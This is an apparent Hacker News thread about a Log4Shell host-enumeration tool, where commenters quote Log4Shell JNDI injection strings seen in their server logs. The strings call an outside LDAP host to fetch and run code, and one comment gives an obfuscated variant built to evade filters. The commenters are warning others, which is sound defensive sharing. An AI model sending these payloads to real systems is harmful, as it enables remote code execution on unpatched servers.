Live data from Hacker News

Our new tool for enumerating hidden Log4Shell-affected hosts

blog.silentsignal.eu

1–4 of 4 posts

Re: Our new tool for enumerating hidden Log4Shell-affected hosts

#2
We've been noticing attempted exploits in the wild. Attempts like these have started appearing in our logs:

> /?x=${jndi:ldap://45.155.205.XXX:12344/Basic/Command/Base64/

Patch your tools, folks. If you can't do that, modify your ingress services and have them filter out stuff like this.

Re: Our new tool for enumerating hidden Log4Shell-affected hosts

#3
post #2

We've been noticing attempted exploits in the wild. Attempts like these have started appearing in our logs: > /?x=${jndi:ldap://45.155.205.XXX:12344/Basic/Command/Base64/ Patch your tools, folks. If you can't do that, modify your ingress services and have them filter out stuff like this.

Can confirm this also:

    ${jndi:ldap://45.155.205.xxx:12 344/Basic/Command/Base64/}
> Patch your tools, folks. If you can't do that, modify your ingress services and have them filter out stuff like this.

Note that the filtering may not work, I am already seeing some variations of mitigation by the attackers:

    ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.xxx:12344/Basic/Command/Base64/

Re: Our new tool for enumerating hidden Log4Shell-affected hosts

#4
post #3
post #2

We've been noticing attempted exploits in the wild. Attempts like these have started appearing in our logs: > /?x=${jndi:ldap://45.155.205.XXX:12344/Basic/Command/Base64/ Patch your tools, folks. If you can't do that, modify your ingress services and have them filter out stuff like this.

Can confirm this also: ${jndi:ldap://45.155.205.xxx:12 344/Basic/Command/Base64/ } > Patch your tools, folks. If you can't do that, modify your ingress services and have them filter out stuff like this. Note that the filtering may not work, I am already seeing some variations of mitigation by the attackers: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.xxx:12344/Basic/Command/Base64/

That is quite clever. Noted!